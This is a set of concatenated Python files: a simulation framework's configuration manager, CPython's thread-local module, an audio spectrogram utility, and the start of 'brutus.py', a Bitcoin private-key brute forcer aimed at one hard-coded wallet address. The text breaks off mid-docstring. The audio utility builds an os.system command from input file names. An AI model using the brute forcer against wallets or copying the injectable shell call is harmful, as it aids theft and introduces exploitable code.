sim_data.init_comp = component_id if sim_data.driver_comp is None: msg = 'Missing DRIVER specification in config file for simulation {}'.format(sim_data.sim_name) self.fwk.critical(msg) raise RuntimeError(msg) if sim_data.init_comp is None: self.fwk.warning('Missing INIT specification in ' + 'config file for simulation %s', sim_data.sim_name) def _create_component(self, comp_conf, sim_data): """ Create component and populate it with the information from the component's configuration section. """ sim_name = sim_data.sim_name class_name = comp_conf['NAME'] if comp_conf['SCRIPT']: try: fullpath = os.path.abspath(comp_conf['SCRIPT']) script = comp_conf['SCRIPT'].rsplit('.', 1)[0].split('/')[-1] spec = importlib.util.spec_from_file_location(script, fullpath) module = importlib.util.module_from_spec(spec) spec.loader.exec_module(module) component_class = getattr(module, class_name) except (FileNotFoundError, AttributeError): self.fwk.error('Error in configuration file : NAME = %s SCRIPT = %s', comp_conf['NAME'], comp_conf['SCRIPT']) self.fwk.exception('Error instantiating IPS component %s From %s', class_name, script) raise else: try: module = importlib.import_module(comp_conf['MODULE']) component_class = getattr(module, class_name) except (ModuleNotFoundError, AttributeError): raise # SIMYAN: removed else conditional, copying files in runspaceInit # component now svc_response_q = Queue(0) invocation_q = Queue(0) component_id = ComponentID(class_name, sim_name) fwk_inq = self.fwk.get_inq() log_pipe_name = sim_data.log_pipe_name services_proxy = ServicesProxy(self.fwk, fwk_inq, svc_response_q, sim_data.sim_conf, log_pipe_name) new_component = component_class(services_proxy, comp_conf) new_component.__initialize__(component_id, invocation_q, self.fwk.start_time) services_proxy.__initialize__(new_component) self.comp_registry.addEntry(component_id, svc_response_q, invocation_q, new_component, services_proxy, comp_conf) p = Process(target=new_component.__run__) p.start() sim_data.process_list.append(p) sim_data.all_comps.append(component_id) return component_id def get_component_map(self): """ Return a dictionary of simulation names and lists of component references. (May only be the driver, and init (if present)???) """ sim_comps = {} for sim_name in self.sim_map: if sim_name == self.fwk_sim_name: continue sim_comps[sim_name] = self.get_simulation_components(sim_name) return sim_comps def get_simulation_components(self, sim_name): comp_list = [] sim_data = self.sim_map[sim_name] if sim_data.init_comp: comp_list.append(sim_data.init_comp) comp_list.append(sim_data.driver_comp) return comp_list def get_all_simulation_components_map(self): sim_comps = {name: sim_map.all_comps[:] for name, sim_map in self.sim_map.items()} del sim_comps[self.fwk_sim_name] return sim_comps def get_framework_components(self): """ Return list of framework components. """ fwk_components = self.fwk_components[:] return fwk_components def get_sim_parameter(self, sim_name, param): """ Return value of *param* from simulation configuration file for *sim_name*. """ try: sim_data = self.sim_map[sim_name] except KeyError: sim_data = self.finished_sim_map[sim_name] try: val = sim_data.sim_conf[param] except KeyError: val = self.platform_conf[param] self.fwk.debug('Returning value = %s for config parameter %s in simulation %s', val, param, sim_name) return val def get_sim_names(self): """ Return list of names of simulations. """ return list(self.sim_map.keys()) def process_service_request(self, msg): """ Invokes public configuration manager method for a component. Return method's return value. """ self.fwk.debug('Configuration Manager received message: %s', str(msg.__dict__)) sim_name = msg.sender_id.get_sim_name() method = getattr(self, msg.target_method) self.fwk.debug('Configuration manager dispatching method %s on simulation %s', method, sim_name) retval = method(sim_name, *msg.args) return retval def create_simulation(self, sim_name, config_file, override, sub_workflow=False): try: conf = ConfigObj(config_file, interpolation='template', file_error=True) except IOError: self.fwk.exception('Error opening config file %s: ', config_file) raise except SyntaxError: self.fwk.exception(' Error parsing config file %s: ', config_file) raise parent_sim_name = sim_name parent_sim = self.sim_map[parent_sim_name] # Incorporate environment variables into config file # Use config file entries when duplicates are detected conf_keys = list(conf.keys()) for (k, v) in os.environ.items(): # Do not include functions from environment if k not in conf_keys and \ not any(x in v for x in '{}()$'): conf[k] = v # Allow propagation of entries from platform config file to simulation # config file for keyword in list(self.platform_conf.keys()): if keyword not in list(conf.keys()): conf[keyword] = self.platform_conf[keyword] if override: for kw in list(override.keys()): conf[kw] = override[kw] try: sim_name = conf['SIM_NAME'] sim_root = conf['SIM_ROOT'] log_file = os.path.abspath(conf['LOG_FILE']) except KeyError: self.fwk.exception('Missing required parameters SIM_NAME, SIM_ROOT or LOG_FILE\ in configuration file %s', config_file) raise if sim_name in self.sim_name_list: self.fwk.error('Error: Duplicate SIM_NAME %s in configuration files' % (sim_name)) raise Exception('Duplicate SIM_NAME %s in configuration files' % (sim_name)) if sim_root in self.sim_root_list: self.fwk.exception('Error: Duplicate SIM_ROOT in configuration files') raise Exception('Duplicate SIM_ROOT in configuration files') if log_file in self.log_file_list: self.fwk.exception('Error: Duplicate LOG_FILE in configuration files') raise Exception('Duplicate LOG_FILE in configuration files') # Add path to configuration file to simulation configuration in memory if 'SIMULATION_CONFIG_FILE' not in conf: conf['SIMULATION_CONFIG_FILE'] = config_file self.sim_name_list.append(sim_name) self.sim_root_list.append(sim_root) self.log_file_list.append(log_file) new_sim = self.SimulationData(sim_name) new_sim.sim_conf = conf new_sim.config_file = config_file new_sim.sim_root = sim_root new_sim.log_file = log_file if not sub_workflow: new_sim.portal_sim_name = sim_name new_sim.log_pipe_name = f'{tempfile.gettempdir()}/ips_{uuid.uuid4()}.logpipe' self.log_dynamic_sim_queue.put('CREATE_SIM %s %s' % (new_sim.log_pipe_name, new_sim.log_file)) else: new_sim.portal_sim_name = parent_sim.portal_sim_name new_sim.log_pipe_name = parent_sim.log_pipe_name conf['__PORTAL_SIM_NAME'] = new_sim.portal_sim_name self.sim_map[sim_name] = new_sim self._initialize_sim(new_sim) if not sub_workflow: self.fwk.initiate_new_simulation(sim_name) return (sim_name, new_sim.init_comp, new_sim.driver_comp) def get_port(self, sim_name, port_name): """ Return a reference to the component from simulation *sim_name* implementing port *port_name*. """ sim_data = self.sim_map[sim_name] comp_id = sim_data.port_map[port_name] return comp_id def get_config_parameter(self, sim_name, param): """ Return value of *param* from simulation configuration file for *sim_name*. """ return self.get_sim_parameter(sim_name, param) def set_config_parameter(self, sim_name, param, value, target_sim_name): """ Set the configuration parameter *param* to value *value* in *target_sim_name*. If *target_sim_name* is the framework, all simulations will get the change. Return *value*. """ if target_sim_name == self.fwk_sim_name: # apply to all simulations target_sims = list(self.sim_map.keys()) else: target_sims = [target_sim_name] for other_sim_name in target_sims: self.fwk.debug('Setting %s to %s in simulation %s', param, value, other_sim_name) try: sim_data = self.sim_map[other_sim_name] except KeyError: sim_data = self.finished_sim_map[other_sim_name] self.fwk.debug('Setting %s to %s in simulation %s', param, value, other_sim_name) sim_conf = sim_data.sim_conf sim_conf[param] = value return value def get_platform_parameter(self, param, silent=False): """ Return value of platform parameter *param*. If *silent* is ``False`` (default) ``None`` is returned when *param* not found, otherwise an exception is raised. """ val = None try: val = self.platform_conf[param] except KeyError: if not silent: self.fwk.warning('CM: No platform data for %s ', param) raise return val def terminate_sim(self, sim_name): sim_data = self.sim_map[sim_name] all_sim_components = sim_data.all_comps msg = 'END_SIM %s' % (sim_data.log_pipe_name) self.log_dynamic_sim_queue.put(msg) proc_list = sim_data.process_list for p in proc_list: p.terminate() p.join() try: os.remove(sim_data.log_pipe_name) except Exception: pass for comp_id in all_sim_components: self.comp_registry.removeEntry(comp_id) sim_data.logger = None sim_data.process_list = [] self.finished_sim_map[sim_name] = sim_data del self.sim_map[sim_name] def terminate(self, status): """ Terminates all processes attached to the framework. *status* not used. """ try: for sim_name in list(self.sim_map.keys()): self.terminate_sim(sim_name) except Exception: print('Encountered exception when terminating simulation') raise for k in list(self.sim_map.keys()): del self.sim_map[k] self.log_process.terminate()
_threading_local.py
"""Thread-local objects. (Note that this module provides a Python version of the threading.local class. Depending on the version of Python you're using, there may be a faster one available. You should always import the `local` class from `threading`.) Thread-local objects support the management of thread-local data. If you have data that you want to be local to a thread, simply create a thread-local object and use its attributes: >>> mydata = local() >>> mydata.number = 42 >>> mydata.number 42 You can also access the local-object's dictionary: >>> mydata.__dict__ {'number': 42} >>> mydata.__dict__.setdefault('widgets', []) [] >>> mydata.widgets [] What's important about thread-local objects is that their data are local to a thread. If we access the data in a different thread: >>> log = [] >>> def f(): ... items = sorted(mydata.__dict__.items()) ... log.append(items) ... mydata.number = 11 ... log.append(mydata.number) >>> import threading >>> thread = threading.Thread(target=f) >>> thread.start() >>> thread.join() >>> log [[], 11] we get different data. Furthermore, changes made in the other thread don't affect data seen in this thread: >>> mydata.number 42 Of course, values you get from a local object, including a __dict__ attribute, are for whatever thread was current at the time the attribute was read. For that reason, you generally don't want to save these values across threads, as they apply only to the thread they came from. You can create custom local objects by subclassing the local class: >>> class MyLocal(local): ... number = 2 ... initialized = False ... def __init__(self, **kw): ... if self.initialized: ... raise SystemError('__init__ called too many times') ... self.initialized = True ... self.__dict__.update(kw) ... def squared(self): ... return self.number ** 2 This can be useful to support default values, methods and initialization. Note that if you define an __init__ method, it will be called each time the local object is used in a separate thread. This is necessary to initialize each thread's dictionary. Now if we create a local object: >>> mydata = MyLocal(color='red') Now we have a default number: >>> mydata.number 2 an initial color: >>> mydata.color 'red' >>> del mydata.color And a method that operates on the data: >>> mydata.squared() 4 As before, we can access the data in a separate thread: >>> log = [] >>> thread = threading.Thread(target=f) >>> thread.start() >>> thread.join() >>> log [[('color', 'red'), ('initialized', True)], 11] without affecting this thread's data: >>> mydata.number 2 >>> mydata.color Traceback (most recent call last): ... AttributeError: 'MyLocal' object has no attribute 'color' Note that subclasses can define slots, but they are not thread local. They are shared across threads: >>> class MyLocal(local): ... __slots__ = 'number' >>> mydata = MyLocal() >>> mydata.number = 42 >>> mydata.color = 'red' So, the separate thread: >>> thread = threading.Thread(target=f) >>> thread.start() >>> thread.join() affects what we see: >>> mydata.number 11 >>> del mydata """ from weakref import ref from contextlib import contextmanager __all__ = ["local"] # We need to use objects from the threading module, but the threading # module may also want to use our `local` class, if support for locals # isn't compiled in to the `thread` module. This creates potential problems # with circular imports. For that reason, we don't import `threading` # until the bottom of this file (a hack sufficient to worm around the # potential problems). Note that all platforms on CPython do have support # for locals in the `thread` module, and there is no circular import problem # then, so problems introduced by fiddling the order of imports here won't # manifest. class _localimpl: """A class managing thread-local dicts""" __slots__ = 'key', 'dicts', 'localargs', 'locallock', '__weakref__' def __init__(self): # The key used in the Thread objects' attribute dicts. # We keep it a string for speed but make it unlikely to clash with # a "real" attribute. self.key = '_threading_local._localimpl.' + str(id(self)) # { id(Thread) -> (ref(Thread), thread-local dict) } self.dicts = {} def get_dict(self): """Return the dict for the current thread. Raises KeyError if none defined.""" thread = current_thread() return self.dicts[id(thread)][1] def create_dict(self): """Create a new dict for the current thread, and return it.""" localdict = {} key = self.key thread = current_thread() idt = id(thread) def local_deleted(_, key=key): # When the localimpl is deleted, remove the thread attribute. thread = wrthread() if thread is not None: del thread.__dict__[key] def thread_deleted(_, idt=idt): # When the thread is deleted, remove the local dict. # Note that this is suboptimal if the thread object gets # caught in a reference loop. We would like to be called # as soon as the OS-level thread ends instead. local = wrlocal() if local is not None: dct = local.dicts.pop(idt) wrlocal = ref(self, local_deleted) wrthread = ref(thread, thread_deleted) thread.__dict__[key] = wrlocal self.dicts[idt] = wrthread, localdict return localdict @contextmanager def _patch(self): impl = object.__getattribute__(self, '_local__impl') try: dct = impl.get_dict() except KeyError: dct = impl.create_dict() args, kw = impl.localargs self.__init__(*args, **kw) with impl.locallock: object.__setattr__(self, '__dict__', dct) yield class local: __slots__ = '_local__impl', '__dict__' def __new__(cls, *args, **kw): if (args or kw) and (cls.__init__ is object.__init__): raise TypeError("Initialization arguments are not supported") self = object.__new__(cls) impl = _localimpl() impl.localargs = (args, kw) impl.locallock = RLock() object.__setattr__(self, '_local__impl', impl) # We need to create the thread dict in anticipation of # __init__ being called, to make sure we don't call it # again ourselves. impl.create_dict() return self def __getattribute__(self, name): with _patch(self): return object.__getattribute__(self, name) def __setattr__(self, name, value): if name == '__dict__': raise AttributeError( "%r object attribute '__dict__' is read-only" % self.__class__.__name__) with _patch(self): return object.__setattr__(self, name, value) def __delattr__(self, name): if name == '__dict__': raise AttributeError( "%r object attribute '__dict__' is read-only" % self.__class__.__name__) with _patch(self): return object.__delattr__(self, name) from threading import current_thread, RLock
spec_utils.py
import os import librosa import numpy as np import soundfile as sf import math import json import hashlib import threading from tqdm import tqdm def crop_center(h1, h2): h1_shape = h1.size() h2_shape = h2.size() if h1_shape[3] == h2_shape[3]: return h1 elif h1_shape[3] < h2_shape[3]: raise ValueError('h1_shape[3] must be greater than h2_shape[3]') # s_freq = (h2_shape[2] - h1_shape[2]) // 2 # e_freq = s_freq + h1_shape[2] s_time = (h1_shape[3] - h2_shape[3]) // 2 e_time = s_time + h2_shape[3] h1 = h1[:, :, :, s_time:e_time] return h1 def wave_to_spectrogram(wave, hop_length, n_fft, mp, multithreading): if mp.param['reverse']: wave_left = np.flip(np.asfortranarray(wave[0])) wave_right = np.flip(np.asfortranarray(wave[1])) elif mp.param['mid_side_b']: wave_left = np.asfortranarray(np.add(wave[0], wave[1] * .5)) wave_right = np.asfortranarray(np.subtract(wave[1], wave[0] * .5)) elif mp.param['mid_side']: wave_left = np.asfortranarray(np.add(wave[0], wave[1]) / 2) wave_right = np.asfortranarray(np.subtract(wave[0], wave[1])) else: wave_left = np.asfortranarray(wave[0]) wave_right = np.asfortranarray(wave[1]) if multithreading: def run_thread(**kwargs): global spec_left_mt spec_left_mt = librosa.stft(**kwargs) thread = threading.Thread(target=run_thread, kwargs={'y': wave_left, 'n_fft': n_fft, 'hop_length': hop_length}) thread.start() spec_right = librosa.stft(wave_right, n_fft, hop_length=hop_length) thread.join() spec = np.asfortranarray([spec_left_mt, spec_right]) else: spec_left = librosa.stft(wave_left, n_fft, hop_length=hop_length) spec_right = librosa.stft(wave_right, n_fft, hop_length=hop_length) spec = np.asfortranarray([spec_left, spec_right]) return spec def combine_spectrograms(specs, mp): l = min([specs[i].shape[2] for i in specs]) spec_c = np.zeros(shape=(2, mp.param['bins'] + 1, l), dtype=np.complex64) offset = 0 bands_n = len(mp.param['band']) for d in range(1, bands_n + 1): h = mp.param['band'][d]['crop_stop'] - mp.param['band'][d]['crop_start'] spec_c[:, offset:offset+h, :l] = specs[d][:, mp.param['band'][d]['crop_start']:mp.param['band'][d]['crop_stop'], :l] offset += h if offset > mp.param['bins']: raise ValueError('Too much bins') # lowpass fiter if mp.param['pre_filter_start'] > 0: # and mp.param['band'][bands_n]['res_type'] in ['scipy', 'polyphase']: if bands_n == 1: spec_c = fft_lp_filter(spec_c, mp.param['pre_filter_start'], mp.param['pre_filter_stop']) else: gp = 1 for b in range(mp.param['pre_filter_start'] + 1, mp.param['pre_filter_stop']): g = math.pow(10, -(b - mp.param['pre_filter_start']) * (3.5 - gp) / 20.0) gp = g spec_c[:, b, :] *= g return np.asfortranarray(spec_c) def spectrogram_to_image(spec, mode='magnitude'): if mode == 'magnitude': if np.iscomplexobj(spec): y = np.abs(spec) else: y = spec y = np.log10(y ** 2 + 1e-8) elif mode == 'phase': if np.iscomplexobj(spec): y = np.angle(spec) else: y = spec y -= y.min() y *= 255 / y.max() img = np.uint8(y) if y.ndim == 3: img = img.transpose(1, 2, 0) img = np.concatenate([ np.max(img, axis=2, keepdims=True), img ], axis=2) return img def reduce_vocal_aggressively(X, y, softmask): v = X - y y_mag_tmp = np.abs(y) v_mag_tmp = np.abs(v) v_mask = v_mag_tmp > y_mag_tmp y_mag = np.clip(y_mag_tmp - v_mag_tmp * v_mask * softmask, 0, np.inf) return y_mag * np.exp(1.j * np.angle(y)) def mask_silence(mag, ref, thres=0.2, min_range=64, fade_size=32): if min_range < fade_size * 2: raise ValueError('min_range must be >= fade_area * 2') mag = mag.copy() idx = np.where(ref.mean(axis=(0, 1)) < thres)[0] starts = np.insert(idx[np.where(np.diff(idx) != 1)[0] + 1], 0, idx[0]) ends = np.append(idx[np.where(np.diff(idx) != 1)[0]], idx[-1]) uninformative = np.where(ends - starts > min_range)[0] if len(uninformative) > 0: starts = starts[uninformative] ends = ends[uninformative] old_e = None for s, e in zip(starts, ends): if old_e is not None and s - old_e < fade_size: s = old_e - fade_size * 2 if s != 0: weight = np.linspace(0, 1, fade_size) mag[:, :, s:s + fade_size] += weight * ref[:, :, s:s + fade_size] else: s -= fade_size if e != mag.shape[2]: weight = np.linspace(1, 0, fade_size) mag[:, :, e - fade_size:e] += weight * ref[:, :, e - fade_size:e] else: e += fade_size mag[:, :, s + fade_size:e - fade_size] += ref[:, :, s + fade_size:e - fade_size] old_e = e return mag def align_wave_head_and_tail(a, b): l = min([a[0].size, b[0].size]) return a[:l,:l], b[:l,:l] def cache_or_load(mix_path, inst_path, mp): mix_basename = os.path.splitext(os.path.basename(mix_path))[0] inst_basename = os.path.splitext(os.path.basename(inst_path))[0] cache_dir = 'mph{}'.format(hashlib.sha1(json.dumps(mp.param, sort_keys=True).encode('utf-8')).hexdigest()) mix_cache_dir = os.path.join('cache', cache_dir) inst_cache_dir = os.path.join('cache', cache_dir) os.makedirs(mix_cache_dir, exist_ok=True) os.makedirs(inst_cache_dir, exist_ok=True) mix_cache_path = os.path.join(mix_cache_dir, mix_basename + '.npy') inst_cache_path = os.path.join(inst_cache_dir, inst_basename + '.npy') if os.path.exists(mix_cache_path) and os.path.exists(inst_cache_path): X_spec_m = np.load(mix_cache_path) y_spec_m = np.load(inst_cache_path) else: X_wave, y_wave, X_spec_s, y_spec_s = {}, {}, {}, {} for d in range(len(mp.param['band']), 0, -1): bp = mp.param['band'][d] if d == len(mp.param['band']): # high-end band X_wave[d], _ = librosa.load( mix_path, bp['sr'], False, dtype=np.float32, res_type=bp['res_type']) y_wave[d], _ = librosa.load( inst_path, bp['sr'], False, dtype=np.float32, res_type=bp['res_type']) else: # lower bands X_wave[d] = librosa.resample(X_wave[d+1], mp.param['band'][d+1]['sr'], bp['sr'], res_type=bp['res_type']) y_wave[d] = librosa.resample(y_wave[d+1], mp.param['band'][d+1]['sr'], bp['sr'], res_type=bp['res_type']) X_wave[d], y_wave[d] = align_wave_head_and_tail(X_wave[d], y_wave[d]) X_spec_s[d] = wave_to_spectrogram(X_wave[d], bp['hl'], bp['n_fft'], mp, False) y_spec_s[d] = wave_to_spectrogram(y_wave[d], bp['hl'], bp['n_fft'], mp, False) del X_wave, y_wave X_spec_m = combine_spectrograms(X_spec_s, mp) y_spec_m = combine_spectrograms(y_spec_s, mp) if X_spec_m.shape != y_spec_m.shape: raise ValueError('The combined spectrograms are different: ' + mix_path) _, ext = os.path.splitext(mix_path) np.save(mix_cache_path, X_spec_m) np.save(inst_cache_path, y_spec_m) return X_spec_m, y_spec_m def spectrogram_to_wave(spec, hop_length, mp, multithreading): import threading spec_left = np.asfortranarray(spec[0]) spec_right = np.asfortranarray(spec[1]) if multithreading: def run_thread(**kwargs): global wave_left wave_left = librosa.istft(**kwargs) thread = threading.Thread(target=run_thread, kwargs={'stft_matrix': spec_left, 'hop_length': hop_length}) thread.start() wave_right = librosa.istft(spec_right, hop_length=hop_length) thread.join() else: wave_left = librosa.istft(spec_left, hop_length=hop_length) wave_right = librosa.istft(spec_right, hop_length=hop_length) if mp.param['reverse']: return np.asfortranarray([np.flip(wave_left), np.flip(wave_right)]) elif mp.param['mid_side_b']: return np.asfortranarray([np.subtract(wave_left / 1.25, .4 * wave_right), np.add(wave_right / 1.25, .4 * wave_left)]) elif mp.param['mid_side']: return np.asfortranarray([np.add(wave_left, wave_right / 2), np.subtract(wave_left, wave_right / 2)]) else: return np.asfortranarray([wave_left, wave_right]) def cmb_spectrogram_to_wave(spec_m, mp, extra_bins_h=None, extra_bins=None): wave_band = {} bands_n = len(mp.param['band']) offset = 0 for d in range(1, bands_n + 1): bp = mp.param['band'][d] spec_s = np.ndarray(shape=(2, bp['n_fft'] // 2 + 1, spec_m.shape[2]), dtype=complex) h = bp['crop_stop'] - bp['crop_start'] spec_s[:, bp['crop_start']:bp['crop_stop'], :] = spec_m[:, offset:offset+h, :] offset += h if d == bands_n: # higher if extra_bins_h: # if --high_end_process bypass max_bin = bp['n_fft'] // 2 spec_s[:, max_bin-extra_bins_h:max_bin, :] = extra_bins[:, :extra_bins_h, :] if bp['hpf_start'] > 0: spec_s = fft_hp_filter(spec_s, bp['hpf_start'], bp['hpf_stop'] - 1) if bands_n == 1: wave = spectrogram_to_wave(spec_s, bp['hl'], mp, False) else: wave = np.add(wave, spectrogram_to_wave(spec_s, bp['hl'], mp, False)) else: sr = mp.param['band'][d+1]['sr'] if d == 1: # lower spec_s = fft_lp_filter(spec_s, bp['lpf_start'], bp['lpf_stop']) wave = librosa.resample(spectrogram_to_wave(spec_s, bp['hl'], mp, False), bp['sr'], sr, res_type="sinc_fastest") else: # mid spec_s = fft_hp_filter(spec_s, bp['hpf_start'], bp['hpf_stop'] - 1) spec_s = fft_lp_filter(spec_s, bp['lpf_start'], bp['lpf_stop']) wave2 = np.add(wave, spectrogram_to_wave(spec_s, bp['hl'], mp, False)) wave = librosa.resample(wave2, bp['sr'], sr, res_type="sinc_fastest") return wave.T def cmb_spectrogram_to_wave_ffmpeg(spec_m, mp, tmp_basename, extra_bins_h=None, extra_bins=None): import subprocess bands_n = len(mp.param['band']) offset = 0 ffmprc = {} for d in range(1, bands_n + 1): bp = mp.param['band'][d] spec_s = np.ndarray(shape=(2, bp['n_fft'] // 2 + 1, spec_m.shape[2]), dtype=complex) h = bp['crop_stop'] - bp['crop_start'] spec_s[:, bp['crop_start']:bp['crop_stop'], :] = spec_m[:, offset:offset+h, :] tmp_wav = '{}_cmb_spectrogram_to_wave_b{}_sr{}'.format(tmp_basename, d, str(bp['sr']) + '.wav') tmp_wav2 = '{}_cmb_spectrogram_to_wave_b{}_sr{}'.format(tmp_basename, d, str(mp.param['sr']) + '.wav') offset += h if d == bands_n: # high-end if extra_bins_h: # if --high_end_process bypass max_bin = bp['n_fft'] // 2 spec_s[:, max_bin-extra_bins_h:max_bin, :] = extra_bins[:, :extra_bins_h, :] if bp['hpf_start'] > 0: spec_s = fft_hp_filter(spec_s, bp['hpf_start'], bp['hpf_stop'] - 1) if bands_n == 1: wave = spectrogram_to_wave(spec_s, bp['hl'], mp, False) else: wave = spectrogram_to_wave(spec_s, bp['hl'], mp, False) else: if d == 1: # lower spec_s = fft_lp_filter(spec_s, bp['lpf_start'], bp['lpf_stop']) else: # mid spec_s = fft_hp_filter(spec_s, bp['hpf_start'], bp['hpf_stop'] - 1) spec_s = fft_lp_filter(spec_s, bp['lpf_start'], bp['lpf_stop']) sf.write(tmp_wav, spectrogram_to_wave(spec_s, bp['hl'], mp, False).T, bp['sr']) ffmprc[d] = subprocess.Popen(['ffmpeg', '-hide_banner', '-loglevel', 'panic', '-y', '-i', tmp_wav, '-ar', str(mp.param['sr']), '-ac', '2', '-c:a', 'pcm_s16le', tmp_wav2]) for s in ffmprc: ffmprc[s].communicate() for d in range(bands_n - 1, 0, -1): os.remove(f'{tmp_basename}_cmb_spectrogram_to_wave_b{d}_sr' + str(mp.param['band'][d]['sr']) + '.wav') tmp_wav2 = f'{tmp_basename}_cmb_spectrogram_to_wave_b{d}_sr' + str(mp.param['sr']) + '.wav' wave2, _ = librosa.load(tmp_wav2, mp.param['sr'], False, dtype=np.float32, res_type="sinc_fastest") os.remove(tmp_wav2) wave = np.add(wave, wave2) return wave.T def fft_lp_filter(spec, bin_start, bin_stop): g = 1.0 for b in range(bin_start, bin_stop): g -= 1 / (bin_stop - bin_start) spec[:, b, :] = g * spec[:, b, :] spec[:, bin_stop:, :] *= 0 return spec def fft_hp_filter(spec, bin_start, bin_stop): g = 1.0 for b in range(bin_start, bin_stop, -1): g -= 1 / (bin_start - bin_stop) spec[:, b, :] = g * spec[:, b, :] spec[:, 0:bin_stop+1, :] *= 0 return spec def mirroring(a, spec_m, input_high_end, mp): if 'mirroring' == a: mirror = np.flip(np.abs(spec_m[:, mp.param['pre_filter_start']-10-input_high_end.shape[1]:mp.param['pre_filter_start']-10, :]), 1) mirror = mirror * np.exp(1.j * np.angle(input_high_end)) return np.where(np.abs(input_high_end) <= np.abs(mirror), input_high_end, mirror) if 'mirroring2' == a: mirror = np.flip(np.abs(spec_m[:, mp.param['pre_filter_start']-10-input_high_end.shape[1]:mp.param['pre_filter_start']-10, :]), 1) mi = np.multiply(mirror, input_high_end * 1.7) return np.where(np.abs(input_high_end) <= np.abs(mi), input_high_end, mi) def ensembling(a, specs): for i in range(1, len(specs)): if i == 1: spec = specs[0] ln = min([spec.shape[2], specs[i].shape[2]]) spec = spec[:,:,:ln] specs[i] = specs[i][:,:,:ln] if 'min_mag' == a: spec = np.where(np.abs(specs[i]) <= np.abs(spec), specs[i], spec) if 'max_mag' == a: spec = np.where(np.abs(specs[i]) >= np.abs(spec), specs[i], spec) return spec if __name__ == "__main__": import cv2 import sys import time import argparse from model_param_init import ModelParameters p = argparse.ArgumentParser() p.add_argument('--algorithm', '-a', type=str, choices=['invert', 'invert_p', 'min_mag', 'max_mag', 'deep', 'align'], default='min_mag') p.add_argument('--model_params', '-m', type=str, default=os.path.join('modelparams', '1band_sr44100_hl512.json')) p.add_argument('--output_name', '-o', type=str, default='output') p.add_argument('--vocals_only', '-v', action='store_true') p.add_argument('input', nargs='+') args = p.parse_args() start_time = time.time() if args.algorithm.startswith('invert') and len(args.input) != 2: raise ValueError('There should be two input files.') if not args.algorithm.startswith('invert') and len(args.input) < 2: raise ValueError('There must be at least two input files.') wave, specs = {}, {} mp = ModelParameters(args.model_params) for i in range(len(args.input)): spec = {} for d in range(len(mp.param['band']), 0, -1): bp = mp.param['band'][d] if d == len(mp.param['band']): # high-end band wave[d], _ = librosa.load( args.input[i], bp['sr'], False, dtype=np.float32, res_type=bp['res_type']) if len(wave[d].shape) == 1: # mono to stereo wave[d] = np.array([wave[d], wave[d]]) else: # lower bands wave[d] = librosa.resample(wave[d+1], mp.param['band'][d+1]['sr'], bp['sr'], res_type=bp['res_type']) spec[d] = wave_to_spectrogram(wave[d], bp['hl'], bp['n_fft'], mp, False) specs[i] = combine_spectrograms(spec, mp) del wave if args.algorithm == 'deep': d_spec = np.where(np.abs(specs[0]) <= np.abs(spec[1]), specs[0], spec[1]) v_spec = d_spec - specs[1] sf.write(os.path.join('{}.wav'.format(args.output_name)), cmb_spectrogram_to_wave(v_spec, mp), mp.param['sr']) if args.algorithm.startswith('invert'): ln = min([specs[0].shape[2], specs[1].shape[2]]) specs[0] = specs[0][:,:,:ln] specs[1] = specs[1][:,:,:ln] if 'invert_p' == args.algorithm: X_mag = np.abs(specs[0]) y_mag = np.abs(specs[1]) max_mag = np.where(X_mag >= y_mag, X_mag, y_mag) v_spec = specs[1] - max_mag * np.exp(1.j * np.angle(specs[0])) else: specs[1] = reduce_vocal_aggressively(specs[0], specs[1], 0.2) v_spec = specs[0] - specs[1] if not args.vocals_only: X_mag = np.abs(specs[0]) y_mag = np.abs(specs[1]) v_mag = np.abs(v_spec) X_image = spectrogram_to_image(X_mag) y_image = spectrogram_to_image(y_mag) v_image = spectrogram_to_image(v_mag) cv2.imwrite('{}_X.png'.format(args.output_name), X_image) cv2.imwrite('{}_y.png'.format(args.output_name), y_image) cv2.imwrite('{}_v.png'.format(args.output_name), v_image) sf.write('{}_X.wav'.format(args.output_name), cmb_spectrogram_to_wave(specs[0], mp), mp.param['sr']) sf.write('{}_y.wav'.format(args.output_name), cmb_spectrogram_to_wave(specs[1], mp), mp.param['sr']) sf.write('{}_v.wav'.format(args.output_name), cmb_spectrogram_to_wave(v_spec, mp), mp.param['sr']) else: if not args.algorithm == 'deep': sf.write(os.path.join('ensembled','{}.wav'.format(args.output_name)), cmb_spectrogram_to_wave(ensembling(args.algorithm, specs), mp), mp.param['sr']) #print('Total time: {0:.{1}f}s'.format(time.time() - start_time, 1)) if args.algorithm == 'align': trackalignment = [ { 'file1':'"{}"'.format(args.input[0]), 'file2':'"{}"'.format(args.input[1]) } ] for i,e in tqdm(enumerate(trackalignment), desc="Performing Alignment..."): os.system(f"python lib/align_tracks.py {e['file1']} {e['file2']}")
brutus.py
# Plutus Bitcoin Brute Forcer # Made by Isaac Delly - change for single adress Bruteforce by Christian Hummel # https://github.com/Isaacdelly/Plutus - https://github.com/diehummel/Brutus-with-fastecdsa # Added fastecdsa - June 2019 - Ian McMurray import os import pickle import hashlib import binascii import multiprocessing import pickle from fastecdsa import keys, curve BTC='19eA3hUfKRt7aZymavdQFXg5EZ6KCVKxr8' os.mkdir('db') coinadress ={ BTC } filename = 'db/00.pickle' outfile = open(filename,'wb') pickle.dump(coinadress,outfile) outfile.close() DATABASE = r'db/' def generate_private_key(): """Generate a random 32-byte hex integer which serves as a randomly generated Bitcoin private key. Average Time: 0.0000061659 seconds """ return binascii.hexlify(os.urandom(32)).decode('utf-8').upper() def private_key_to_public_key(private_key): """Accept a hex private key and convert it to its respective public key. Because converting a private key to a public key requires SECP256k1 ECDSA signing, this function is the most time consuming and is a bottleneck in the overall speed of the program. Average Time: 0.0016401287 seconds """ # get the public key corresponding to the private key we just generated c = int('0x%s'%private_key,0) d = keys.get_public_key(c, curve.secp256k1) return '04%s%s'%('{0:x}'.format(int(d.x)), '{0:x}'.format(int(d.y))) def public_key_to_address(public_key): """Accept a public key and convert it to its resepective P2PKH wallet address. Average Time: 0.0000801390 seconds """ #print('Wanting to [%s] this to address'%public_key) output = []; alphabet = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz' var = hashlib.new('ripemd160') try: var.update(hashlib.sha256(binascii.unhexlify(public_key.encode())).digest()) var = '00' + var.hexdigest() + hashlib.sha256(hashlib.sha256(binascii.unhexlify(('00' + var.hexdigest()).encode())).digest()).hexdigest()[0:8] count = [char != '0' for char in var].index(True) // 2 n = int(var, 16) while n > 0: n, remainder = divmod(n, 58) output.append(alphabet[remainder]) for i in range(count): output.append(alphabet[0]) return ''.join(output[::-1]) except: # Nothing return -1 def process(private_key, public_key, address, database): """Accept an address and query the database. If the address is found in the database, then it is 